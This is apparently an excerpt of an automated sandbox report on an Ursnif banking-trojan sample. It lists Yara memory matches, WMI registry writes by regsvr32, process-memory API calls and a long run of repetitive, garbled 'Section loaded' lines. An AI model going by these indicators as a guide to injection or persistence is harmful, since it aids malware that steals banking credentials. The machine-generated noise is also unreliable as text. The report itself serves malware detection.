            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&amp;vertical=custom&amp;pageType=
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002
            Source: iab2Data[1].json.4.drString found in binary or memory: https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin
            Source: iab2Data[1].json.4.drString found in binary or memory: https://www.vidstart.com/wp-content/uploads/2018/09/PrivacyPolicyPDF-Vidstart.pdf

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.246155048.0000000004C08000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.246163014.0000000004C08000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.246138579.0000000004C08000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.246106262.0000000004C08000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.246073965.0000000004C08000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.246124544.0000000004C08000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.246050953.0000000004C08000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.246026910.0000000004C08000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5560, type: MEMORY
            Source: loaddll32.exe, 00000000.00000002.612457244.000000000119B000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.246155048.0000000004C08000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.246163014.0000000004C08000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.246138579.0000000004C08000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.246106262.0000000004C08000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.246073965.0000000004C08000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.246124544.0000000004C08000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.246050953.0000000004C08000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.246026910.0000000004C08000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5560, type: MEMORY

            System Summary:

            barindex
            Writes or reads registry keys via WMIShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMIShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00A810BA NtMapViewOfSection,1_2_00A810BA
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00A81A34 GetProcAddress,NtCreateSection,memset,1_2_00A81A34
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00A823F5 NtQueryVirtualMemory,1_2_00A823F5
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00DF71B9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,1_2_00DF71B9
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00DFB2FD NtQueryVirtualMemory,1_2_00DFB2FD
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00A821D41_2_00A821D4
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00DFB0DC1_2_00DFB0DC
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00DF59201_2_00DF5920
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: lpk.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: msafd.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: @ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ? .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: > .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: = .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: < .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ; .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: : .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 9 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 8 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 7 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 6 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 5 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 4 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 3 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 2 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 1 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 0 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: - .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: , .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: + .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: * .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ) .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ( .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ' .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: & .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: % .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: $ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: # .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ' .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ! .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ~ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: } .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: | .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: { .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: z .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: y .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: x .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: w .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: v .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: u .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: t .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: s .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: r .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: q .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: p .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: o .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: n .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: m .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: l .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: k .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: j .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: i .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: h .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: g .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: f .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: e .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: d .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: c .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: b .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: a .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ` .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: _ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ^ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ] .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: [ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: z .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: y .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: x .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: w .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: v .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: u .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: t .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: s .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: r .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: q .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: p .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: o .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: n .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: m .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: l .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: k .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: j .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: i .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: h .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: g .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: f .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: e .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: d .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: c .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: b .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: a .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: @ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ? .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: > .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: = .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: < .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ; .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: : .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 9 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 8 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 7 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 6 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 5 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 4 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 3 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 2 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 1 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 0 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: - .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: , .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: + .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: * .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ) .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ( .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ' .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: & .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: % .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: $ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: # .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ' .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ! .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
